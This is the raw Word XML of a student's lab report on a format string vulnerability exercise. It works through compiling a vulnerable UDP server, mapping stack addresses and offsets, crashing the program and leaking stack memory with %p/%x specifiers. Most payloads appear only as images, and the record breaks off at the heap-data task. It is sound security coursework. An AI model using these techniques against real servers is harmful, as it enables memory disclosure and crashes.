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869D6" w14:textId="090AAB7F" w:rsidR="008B6F2B" w:rsidRDefault="00996C91" w:rsidP="00996C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C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Format String Vulnerability Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961E865" w14:textId="75573138" w:rsidR="00996C91" w:rsidRDefault="00996C91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tin Hansen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC60992" w14:textId="77777777" w:rsidR="00996C91" w:rsidRPr="003B2B29" w:rsidRDefault="00996C91" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B2B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1001530325</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D083AD7" w14:textId="5B69FA1B" w:rsidR="00996C91" w:rsidRDefault="00996C91" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BACD65F" w14:textId="364FA233" w:rsidR="00996C91" w:rsidRDefault="00996C91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996C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Task 1: The Vulnerable Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280E4FFA" w14:textId="7686C7BA" w:rsidR="00996C91" w:rsidRDefault="00996C91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54EBB" wp14:editId="34C7F821">
            <wp:extent cx="4404742" cy="754445"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1" name="Picture 1" descr="A picture containing text, device, meter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evice, meter, gaug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E30" w14:textId="2C611977" w:rsidR="00996C91" w:rsidRDefault="00996C91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we turn off address space randomization for the later tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241ABC0E" w14:textId="750958B7" w:rsidR="00996C91" w:rsidRDefault="00996C91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19A42" wp14:editId="7B688D80">
            <wp:extent cx="5943600" cy="1370965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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5002" w14:textId="22041EB5" w:rsidR="00996C91" w:rsidRDefault="00996C91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we compile getting a warning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ing a vulnerability to format string attacks, we the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un the server program that we just compiled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131ADCD3" w14:textId="00E06EB9" w:rsidR="00996C91" w:rsidRDefault="00996C91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2C212" wp14:editId="5F16985F">
            <wp:extent cx="4366638" cy="44961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6C80" w14:textId="6E118871" w:rsidR="00996C91" w:rsidRDefault="00996C91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net cat, we attempt to connect to our server program. (as a side not the ‘u’ in the command is for UDP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC3F6E" w14:textId="605DBBE1" w:rsidR="00996C91" w:rsidRDefault="005C7250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B93B20" wp14:editId="240B4B8A">
            <wp:extent cx="4404742" cy="716342"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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A346" w14:textId="58475266" w:rsidR="005C7250" w:rsidRDefault="005C7250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, we have a successful connection, lets try with a file…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4330F1FD" w14:textId="05BDF5B5" w:rsidR="005C7250" w:rsidRDefault="005C7250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3911DD" wp14:editId="3C904543">
            <wp:extent cx="4320914" cy="44199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D67A" w14:textId="24E3A41C" w:rsidR="005C7250" w:rsidRDefault="005C7250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E46A8" wp14:editId="1AA77296">
            <wp:extent cx="4564776" cy="55630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81D0" w14:textId="66E91892" w:rsidR="005C7250" w:rsidRDefault="005C7250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right, success the contents of our file has been printed out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176079A0" w14:textId="26CDF9EB" w:rsidR="005C7250" w:rsidRDefault="005C7250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 </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Task 2: Understanding the Layout of the Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F97A72" w14:textId="5C02CE20" w:rsidR="005C7250" w:rsidRDefault="005C7250" w:rsidP="005C72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BDAD2" wp14:editId="6C0B3299">
            <wp:extent cx="4572000" cy="3020541"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"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950" cy="303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8667" w14:textId="70317C5E" w:rsidR="005C7250" w:rsidRDefault="005C7250" w:rsidP="005C7250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Question 1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7250">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What are the memory addresses at the locations marked by </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>➊</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>➋</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>➌</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B21B4" w14:textId="5D58A7B1" w:rsidR="00BE1F25" w:rsidRPr="00197165" w:rsidRDefault="00BE1F25" w:rsidP="00BE1F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71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57D2845" w14:textId="17B3EA7E" w:rsidR="005C7250" w:rsidRDefault="00116742" w:rsidP="00BE1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59C17B" wp14:editId="7D5701ED">
            <wp:extent cx="5943600" cy="110998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CDAD" w14:textId="7A0785B5" w:rsidR="00116742" w:rsidRDefault="006D2FD7" w:rsidP="00BE1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mally, </w:t>
      </w:r>
      <w:r w:rsidR="00312BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> show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, the only problem is that it is huge</w:t>
      </w:r>
      <w:r w:rsidR="00D50278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, but the same number </w:t>
      </w:r>
      <w:r w:rsidR="003A179B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of total</w:t>
      </w:r>
      <w:r w:rsidR="00D87BD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> items</w:t>
      </w:r>
      <w:r w:rsidR="00D50278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (72)</w:t>
      </w:r>
      <w:r w:rsidR="00D87BD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> printed here</w:t>
      </w:r>
      <w:r w:rsidR="006B292D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. So, </w:t>
      </w:r>
      <w:r w:rsidR="00312BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="009C0EA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> get where the format string is in relation to </w:t>
      </w:r>
      <w:r w:rsidR="004740B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the end of our buffer,</w:t>
      </w:r>
      <w:r w:rsidR="00CA72D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we use: 72*4 to get the distance, then </w:t>
      </w:r>
      <w:r w:rsidR="00DF6B7D" w:rsidRPr="00DF6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0xbfffe6a0</w:t>
      </w:r>
      <w:r w:rsidR="00DF6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-288</w:t>
      </w:r>
      <w:r w:rsidR="00CD176C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> giving us </w:t>
      </w:r>
      <w:r w:rsidR="00312BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bfffe580</w:t>
      </w:r>
      <w:r w:rsidR="003A179B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This makes sense, given that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A179B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A179B"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gramStart"/>
      <w:r w:rsidR="003A179B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>actually starts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003A179B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidR="0082658E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>this number when msg is printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715EC72F" w14:textId="0B2625CC" w:rsidR="00197165" w:rsidRDefault="00924E7C" w:rsidP="0019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5D76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184AAAC" w14:textId="2B8B6496" w:rsidR="00D91E0A" w:rsidRDefault="00D91E0A" w:rsidP="001971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9E88CA" wp14:editId="6FFC3763">
            <wp:extent cx="6012811" cy="5181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354" cy="51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9BD3" w14:textId="4A0731D7" w:rsidR="008B6F2B" w:rsidRDefault="00CD6D32" w:rsidP="001971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0FD4AF" wp14:editId="2A2DE229">
            <wp:extent cx="2945037" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="825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488" cy="43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4A56" w14:textId="13B52CDF" w:rsidR="00636017" w:rsidRPr="008C7769" w:rsidRDefault="008C7769" w:rsidP="00197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etting a breakpoint</w:t>
      </w:r>
      <w:r w:rsidR="00D91E0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidR="00310BFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the function at 0x08048633 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00310BF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310BFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) we can print out the address of msg to </w:t>
      </w:r>
      <w:r w:rsidR="00C30FB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">then find </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C30FB5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="00C30FB5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> return address, which is 0xbfffe59c</w:t>
      </w:r>
      <w:r w:rsidR="0046318B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A56C1" w14:textId="77777777" w:rsidR="00636017" w:rsidRPr="008B6F2B" w:rsidRDefault="00636017" w:rsidP="00197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3969C1" w14:textId="171EBB23" w:rsidR="00636017" w:rsidRDefault="00924E7C" w:rsidP="00197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6F2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0FDEE9B" w14:textId="303693C7" w:rsidR="004B0FB4" w:rsidRDefault="004B0FB4" w:rsidP="0019716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CFFDDA" wp14:editId="4DB26059">
            <wp:extent cx="5192160" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="889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924" cy="84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EDE0" w14:textId="71EFAE1F" w:rsidR="00653F6A" w:rsidRPr="00653F6A" w:rsidRDefault="00653F6A" w:rsidP="00197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given this address</w:t>
      </w:r>
      <w:r w:rsidR="004B0FB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CD6D32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as “The address of the input array: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CD6D32" w:rsidRPr="00CD6D32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0xbfffe6a0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CD6D32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D24168" w14:textId="60B3E3A8" w:rsidR="005C7250" w:rsidRPr="005C7250" w:rsidRDefault="005C7250" w:rsidP="005C7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50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the distance between the locations marked by </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>➊</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>➌</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7250">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0E54E3" w14:textId="3C511C77" w:rsidR="00996C91" w:rsidRPr="005931BA" w:rsidRDefault="005931BA" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005931BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0xbfffe6a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31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fffe580=288</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781D1788" w14:textId="77777777" w:rsidR="000A597D" w:rsidRDefault="000A597D" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE7D0DF" w14:textId="59FA4DB5" w:rsidR="00D947C0" w:rsidRDefault="00D947C0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D947C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task 3: Crash the Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283F7E9" w14:textId="74CEFAEA" w:rsidR="00D947C0" w:rsidRDefault="00D947C0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BCD6D7" wp14:editId="3229487F">
            <wp:extent cx="2206233" cy="6400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225" cy="64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C77D" w14:textId="18CD30CB" w:rsidR="00D947C0" w:rsidRDefault="00D947C0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the lecture, I entered two inputs pictured above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A27D0" w14:textId="11E656E0" w:rsidR="00D947C0" w:rsidRDefault="00D947C0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AC9C5" wp14:editId="31FB5486">
            <wp:extent cx="4747671" cy="1204064"/>
            <wp:effectExtent l="0" t="0" r="0" b="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3FBF" w14:textId="53EEEC4C" w:rsidR="00D13D59" w:rsidRDefault="00D947C0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ulted in a segmentation fault, just like we wanted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEBFEFF" w14:textId="6BA238E0" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496CEB13" w14:textId="728321EC" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB95BC3" w14:textId="01021997" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489C6FDA" w14:textId="347BC84D" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC00991" w14:textId="613BC01D" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C45FA77" w14:textId="33A69095" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18056671" w14:textId="2237CD60" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CEAAEC" w14:textId="008011C8" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151A306F" w14:textId="77777777" w:rsidR="00B03970" w:rsidRDefault="00B03970" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C296539" w14:textId="0252E53F" w:rsidR="00D947C0" w:rsidRDefault="00D947C0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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D947C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task 4: Print Out the Server Program’s Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41315789" w14:textId="1CF7FEB6" w:rsidR="00D13D59" w:rsidRDefault="00D13D59" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F351B9" w14:textId="4B3A41F6" w:rsidR="00D13D59" w:rsidRPr="00D13D59" w:rsidRDefault="00D13D59" w:rsidP="00996C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13D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 4.A: Stack Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D8478F" w14:textId="6CB5382B" w:rsidR="00D947C0" w:rsidRDefault="00D13D59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A52AA2" wp14:editId="6D8399EE">
            <wp:extent cx="6421755" cy="6629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828" cy="66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BB6F" w14:textId="24667135" w:rsidR="00D13D59" w:rsidRDefault="00D13D59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EC278D" wp14:editId="12DECE05">
            <wp:extent cx="5943600" cy="14097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CA89" w14:textId="51A037C4" w:rsidR="00D13D59" w:rsidRDefault="00D13D59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tal number of format specifiers needed were 72, 71 %p and 1 %x, 6c6c6568 translates to “hell”, if we made the number of format specifiers 73 with 2 %x we would get the whole word</w:t>
      </w:r>
      <w:r w:rsidR="00A37D13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, “hello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78E892" w14:textId="3E655ADE" w:rsidR="00A37D13" w:rsidRDefault="00A37D13" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A37D13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 4.B: Heap Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515BCC11" w14:textId="5A501A8C" w:rsidR="00A37D13" w:rsidRDefault="00A37D13" w:rsidP="00996C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4A7A15" wp14:editId="63D07FA7">
            <wp:extent cx="5596218" cy="838200"/>
